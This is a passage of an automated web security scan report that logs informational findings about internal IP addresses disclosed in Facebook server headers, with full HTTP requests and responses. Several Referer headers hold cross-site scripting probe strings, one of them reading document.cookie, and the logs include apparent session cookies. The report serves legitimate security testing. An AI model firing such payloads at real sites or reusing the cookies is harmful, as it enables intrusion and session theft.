<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.37. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3647379a8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=9392
Expires: Tue, 06 Sep 2011 15:21:51 GMT
Date: Tue, 06 Sep 2011 12:45:19 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.38. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df22119cc94%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2803b0c5c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df246c4d738%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3587aa258%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df11f62758%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3abb1fdbc%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.128.47
X-Cnection: close
Date: Tue, 06 Sep 2011 12:46:07 GMT
Content-Length: 271

<script type="text/javascript">
parent.postMessage("?=&cb=f3587aa258&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff27ad894f4&relation=parent&transport=postmessage&frame=f3abb1fdbc&result
...[SNIP]...

19.39. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2cd8b2c5%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df247f280f4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2c9df72fc%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfcb7b3804%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df86ea4bb4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df71e2b9b8%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.135.41
X-Cnection: close
Date: Tue, 06 Sep 2011 12:44:56 GMT
Content-Length: 269

<script type="text/javascript">
parent.postMessage("?=&cb=fcb7b3804&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff3b0d7c228&relation=parent&transport=postmessage&frame=f71e2b9b8&result=x
...[SNIP]...

19.40. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a19dedf9b9f58%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13cc7cce322034%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11b4e66cf613ae%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df139aca019d0d4a%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df207c180db41b1a%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff34bd257aa0cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38909eb3473868&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3balert(1)//9336b0fa1c5
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.108.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:55:37 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f139aca019d0d4a&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff34bd257aa0cfc&relation=parent&transport=postmessage&frame=f38909eb34738
...[SNIP]...

19.41. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df156aa52c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfbe4c1258%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2793c1f%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2452a6c9c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dff3bb775%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff3b0d7c228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d97d5ac4%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.165.45
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:05 GMT
Content-Length: 271

<script type="text/javascript">
parent.postMessage("?=&cb=f2452a6c9c&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff3b0d7c228&relation=parent&transport=postmessage&frame=f1d97d5ac4&result
...[SNIP]...

19.42. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f7311028a994a%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b9737aad60de%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc417de2e6d0cc%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33e27b5c130646%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff9b31de9b1812%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff30d33915dc2dca%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df9537b0afc7482&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.117.41
X-Cnection: close
Date: Tue, 06 Sep 2011 12:55:23 GMT
Content-Length: 260

<script type="text/javascript">
parent.postMessage("cb=f33e27b5c130646&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff30d33915dc2dca&relation=parent&transport=postmessage&frame=f9537b0afc74
...[SNIP]...

19.43. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19ecc8691df262%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b75be2b5dc614%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ed947585ca75e%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15def3c5eec6f6%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b0aabe0f398b4%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.37
X-Cnection: close
Date: Tue, 06 Sep 2011 12:55:51 GMT
Content-Length: 261

<script type="text/javascript">
parent.postMessage("cb=f15def3c5eec6f6&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff1078b3d2a0c68e&relation=parent&transport=postmessage&frame=f302359b9dcd
...[SNIP]...

19.44. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1ea97168c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df115386ba%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df137439048%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df16e85cf88%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df143bb58e4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.120.45
X-Cnection: close
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Length: 270

<script type="text/javascript">
parent.postMessage("?=&cb=f16e85cf88&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff27ad894f4&relation=parent&transport=postmessage&frame=f323849ec&result=
...[SNIP]...

19.45. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1158553dc%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3d3f3d5a4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfa0adb5e8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2faf2224%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df47133458%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.136.48
X-Cnection: close
Date: Tue, 06 Sep 2011 12:48:10 GMT
Content-Length: 269

<script type="text/javascript">
parent.postMessage("?=&cb=f2faf2224&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff323a3374c&relation=parent&transport=postmessage&frame=f959b19dc&result=x
...[SNIP]...

19.46. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df277dfee7c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df242d21f1%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2cea178d8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1493b4af8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1d5a9908%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.45
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:23 GMT
Content-Length: 269

<script type="text/javascript">
